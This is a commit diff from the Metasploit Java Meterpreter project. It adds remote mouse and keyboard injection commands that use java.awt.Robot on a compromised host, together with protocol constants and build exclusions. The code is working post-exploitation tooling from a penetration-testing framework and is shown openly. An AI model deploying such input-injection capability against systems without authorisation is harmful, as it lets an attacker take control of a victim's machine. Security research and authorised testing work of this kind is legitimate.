Land #350, Add keyboard and mouse input for the java meterpreter

Merge branch 'land-350' into upstream-master

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java

@@ -173,9 +173,14 @@ public interface TLVType {
     public static final int TLV_TYPE_REGISTER          = TLVPacket.TLV_META_TYPE_GROUP  | 2550;
 
     // Ui
-    public static final int TLV_TYPE_IDLE_TIME = TLVPacket.TLV_META_TYPE_UINT   | 3000;
-    public static final int TLV_TYPE_KEYS_DUMP = TLVPacket.TLV_META_TYPE_STRING | 3001;
-    public static final int TLV_TYPE_DESKTOP   = TLVPacket.TLV_META_TYPE_STRING | 3002;
+    public static final int TLV_TYPE_IDLE_TIME = TLVPacket.TLV_META_TYPE_UINT    | 3000;
+    public static final int TLV_TYPE_KEYS_DUMP = TLVPacket.TLV_META_TYPE_STRING  | 3001;
+    public static final int TLV_TYPE_DESKTOP   = TLVPacket.TLV_META_TYPE_STRING  | 3002;
+    public static final int TLV_TYPE_KEYS_SEND = TLVPacket.TLV_META_TYPE_STRING  | 3014;
+    public static final int TLV_TYPE_MOUSE_ACTION = TLVPacket.TLV_META_TYPE_UINT | 3015;
+    public static final int TLV_TYPE_MOUSE_X = TLVPacket.TLV_META_TYPE_UINT      | 3016;
+    public static final int TLV_TYPE_MOUSE_Y = TLVPacket.TLV_META_TYPE_UINT      | 3017;
+    public static final int TLV_TYPE_KEYEVENT_SEND = TLVPacket.TLV_META_TYPE_RAW | 3018;
 
     // Event Log
     public static final int TLV_TYPE_EVENT_SOURCENAME = TLVPacket.TLV_META_TYPE_STRING | 4000;

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/Loader.java

@@ -52,6 +52,8 @@ public class Loader implements ExtensionLoader {
         mgr.registerCommand("stdapi_sys_process_close", stdapi_sys_process_close.class);
         mgr.registerCommand("stdapi_sys_process_get_processes", stdapi_sys_process_get_processes.class, V1_2);
         mgr.registerCommand("stdapi_ui_desktop_screenshot", stdapi_ui_desktop_screenshot.class, V1_4);
+        mgr.registerCommand("stdapi_ui_send_mouse", stdapi_ui_send_mouse.class, V1_4);
+        mgr.registerCommand("stdapi_ui_send_keyevent", stdapi_ui_send_keyevent.class, V1_4);
         mgr.registerCommand("webcam_audio_record", webcam_audio_record.class, V1_4);
     }
 }

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_ui_send_keyevent.java

@@ -0,0 +1,5 @@
+package com.metasploit.meterpreter.stdapi;
+
+// Dummy class
+public class stdapi_ui_send_keyevent {
+}

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_ui_send_keyevent_V1_4.java

@@ -0,0 +1,67 @@
+package com.metasploit.meterpreter.stdapi;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+import java.awt.Robot;
+import java.awt.event.KeyEvent;
+import java.security.Key;
+import java.util.HashMap;
+import java.util.Map;
+
+public class stdapi_ui_send_keyevent_V1_4 extends stdapi_ui_send_keyevent implements Command {
+
+    private static Map<Integer, Integer> keyMapping = new HashMap<Integer, Integer>()
+    {
+        {
+            put(0x08, KeyEvent.VK_DELETE);
+            put( 0x09 , KeyEvent.VK_TAB);
+            put( 0x0C , KeyEvent.VK_CLEAR);
+            put( 0x0D , KeyEvent.VK_ENTER);
+            put( 0xBA , KeyEvent.VK_SEMICOLON);
+            put( 0xBB , KeyEvent.VK_EQUALS);
+            put( 0xBC , KeyEvent.VK_COMMA);
+            put( 0xBD , KeyEvent.VK_MINUS);
+            put( 0xBE , KeyEvent.VK_PERIOD);
+            put( 0xBF , KeyEvent.VK_SLASH);
+            put( 0xC0 , KeyEvent.VK_QUOTE);
+            put( 0xDB , KeyEvent.VK_BRACELEFT);
+            put( 0xDC , KeyEvent.VK_BACK_SLASH);
+            put( 0xDD , KeyEvent.VK_BRACERIGHT);
+            put( 0xDE , KeyEvent.VK_NUMBER_SIGN);
+            put( 0xDF , KeyEvent.VK_BACK_QUOTE);
+        }
+    };
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        byte[] keyevents = request.getRawValue(TLVType.TLV_TYPE_KEYEVENT_SEND);
+        for (int i=0;i<keyevents.length;i+=8) {
+            int action = keyevents[i+3] << 24 | (keyevents[i+2] & 0xFF) << 16 | (keyevents[i+1] & 0xFF) << 8 | (keyevents[i] & 0xFF);
+            int keycode = keyevents[i+7] << 24 | (keyevents[i+6] & 0xFF) << 16 | (keyevents[i+5] & 0xFF) << 8 | (keyevents[i+4] & 0xFF);
+            Integer key = keyMapping.get(keycode);
+            if (key != null) {
+                keycode = key;
+            }
+            try {
+                performKeyEvent(action, keycode);
+            } catch (IllegalArgumentException e) {
+            }
+        }
+        return ERROR_SUCCESS;
+    }
+
+    private void performKeyEvent(int action, int keycode) throws Exception {
+        Robot robot = new Robot();
+        if (action == 1) {
+            robot.keyPress(keycode);
+        } else if (action == 2) {
+            robot.keyRelease(keycode);
+        } else {
+            robot.keyPress(keycode);
+            robot.keyRelease(keycode);
+        }
+    }
+
+}

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_ui_send_mouse.java

@@ -0,0 +1,5 @@
+package com.metasploit.meterpreter.stdapi;
+
+// Dummy class
+public class stdapi_ui_send_mouse {
+}

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_ui_send_mouse_V1_4.java

@@ -0,0 +1,53 @@
+package com.metasploit.meterpreter.stdapi;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+import java.awt.Robot;
+import java.awt.event.InputEvent;
+
+public class stdapi_ui_send_mouse_V1_4 extends stdapi_ui_send_mouse implements Command {
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        int action = request.getIntValue(TLVType.TLV_TYPE_MOUSE_ACTION);
+        int x = request.getIntValue(TLVType.TLV_TYPE_MOUSE_X);
+        int y = request.getIntValue(TLVType.TLV_TYPE_MOUSE_Y);
+
+        Robot robot = new Robot();
+        if (x != -1 && y != -1) {
+            robot.mouseMove(x, y);
+        }
+        switch (action) {
+            case 1:
+                robot.mousePress(InputEvent.BUTTON1_MASK);
+                robot.mouseRelease(InputEvent.BUTTON1_MASK);
+                break;
+            case 2:
+                robot.mousePress(InputEvent.BUTTON1_MASK);
+                break;
+            case 3:
+                robot.mouseRelease(InputEvent.BUTTON1_MASK);
+                break;
+            case 4:
+                robot.mousePress(InputEvent.BUTTON3_MASK);
+                robot.mouseRelease(InputEvent.BUTTON3_MASK);
+                break;
+            case 5:
+                robot.mousePress(InputEvent.BUTTON3_MASK);
+                break;
+            case 6:
+                robot.mouseRelease(InputEvent.BUTTON3_MASK);
+                break;
+            case 7:
+                robot.mousePress(InputEvent.BUTTON1_MASK);
+                robot.mouseRelease(InputEvent.BUTTON1_MASK);
+                robot.mousePress(InputEvent.BUTTON1_MASK);
+                robot.mouseRelease(InputEvent.BUTTON1_MASK);
+                break;
+        }
+
+        return ERROR_SUCCESS;
+    }
+}

java/version-compatibility-check/android-api/pom.xml

@@ -48,6 +48,8 @@
 										<exclude name="**/stdapi_net_config_get_interfaces_V1_6.java" />
 										<exclude name="**/stdapi_fs_stat_V1_6.java" />
 										<exclude name="**/stdapi_ui_desktop_screenshot_V1_4.java" />
+										<exclude name="**/stdapi_ui_send_mouse_V1_4.java" />
+										<exclude name="**/stdapi_ui_send_keyevent_V1_4.java" />
 										<exclude name="metasploit/PayloadApplet.java" />
 									</fileset>
 									<fileset dir="${project.basedir}/../../androidpayload/app/src" includes="**/*.java" excludes="**/MainActivity.java" />